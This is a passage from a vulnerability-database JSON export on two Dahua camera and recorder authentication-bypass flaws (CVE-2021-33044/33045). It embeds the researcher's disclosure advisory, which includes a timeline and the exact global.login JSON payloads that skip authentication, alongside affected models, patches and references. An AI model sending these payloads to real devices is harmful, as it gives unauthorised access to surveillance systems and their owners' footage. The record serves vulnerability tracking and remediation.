\"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"[REDACTED]\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Plain\",\n \"password\": \"admin\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n[ETX]\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 3.51
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33044",
"trust": 5.4
},
{
"db": "PACKETSTORM",
"id": "164423",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVN83655695",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-103421",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2021-70816",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-33044",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"id": "VAR-202109-1875",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
}
]
},
"last_update_date": "2024-01-19T23:24:12.199000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dahua\u00a0Technology : DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"title": "DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/aboutus/trustedcenter/details/582"
},
{
"title": "Patch for Dahua IPC authentication bypass vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/311536"
},
{
"title": "Patch for Identity authentication bypass vulnerabilities in some Dahua products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/290751"
},
{
"title": "Dahua IPC Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164675"
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/mcw0/poc "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "Inappropriate authentication (CWE-287) [IPA evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2021/oct/13"
},
{
"trust": 2.3,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
},
{
"trust": 0.8,
"url": "https://jvn.jp/jp/jvn83655695/index.html"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/poc"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/dahuaconsole"
},
{
"trust": 0.1,
"url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"db": "VULMON",
"id": "CVE-2021-33044"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"date": "2024-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"date": "2021-10-06T15:11:51",
"db": "PACKETSTORM",
"id": "164423"
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"date": "2021-09-15T22:15:10.497000",
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103421"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70816"
},
{
"date": "2022-08-31T04:47:00",
"db": "JVNDB",
"id": "JVNDB-2021-012422"
},
{
"date": "2024-01-18T03:08:00",
"db": "JVNDB",
"id": "JVNDB-2024-000007"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1080"
},
{
"date": "2021-12-02T13:50:00.800000",
"db": "NVD",
"id": "CVE-2021-33044"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012422"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1080"
}
],
"trust": 0.6
}
}
VAR-202109-1874
Vulnerability from variot - Updated: 2023-12-18 12:16The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP
Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}
[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }
Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }
[ETX]
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1874",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hum7xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "xvr-5x16",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "vto-75x95x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000003.0.r.210714"
},
{
"model": "ipc-hx5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.820.0000000.5.r.210705"
},
{
"model": "vth-542xh",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.500.0000002.0.r.210715"
},
{
"model": "xvr-4x04",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210709"
},
{
"model": "vto-65xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.300.0000004.0.r.210715"
},
{
"model": "xvr-5x08",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-4x08",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210709"
},
{
"model": "nvr-6xx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000001.1.r.210716"
},
{
"model": "ipc-hx3xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2.800.0000000.29.r.210630"
},
{
"model": "nvr-5xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000000.0.r.210710"
},
{
"model": "xvr-7x32",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-7x16",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "nvr-2xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000000.1.r.210710"
},
{
"model": "xvr-5x04",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000003.1.r.210710"
},
{
"model": "xvr-4x04",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "nvr-4xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000005.1.r.210713"
},
{
"model": "nvr-1xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "4.001.0000005.1.r.210709"
},
{
"model": "vth-542xh",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "vto-65xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-4xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-6xx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "nvr-1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum7xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx3xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "hx5xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "hum7xxx versions which build time before may",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2020"
},
{
"model": "vto75x95x versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "vto65xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "vth542xh versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr1xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr2xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr5xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "nvr6xx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr4xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr5xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
},
{
"model": "xvr7xxx versions which build time before december",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2019"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.800.0000000.29.r.210630",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.820.0000000.5.r.210705",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-1xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000005.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-2xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000000.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-4xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000005.1.r.210713",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-5xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000000.0.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-6xx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210716",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-6xx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.500.0000002.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000004.0.r.210715",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.300.0000003.0.r.210714",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x08_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x08:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
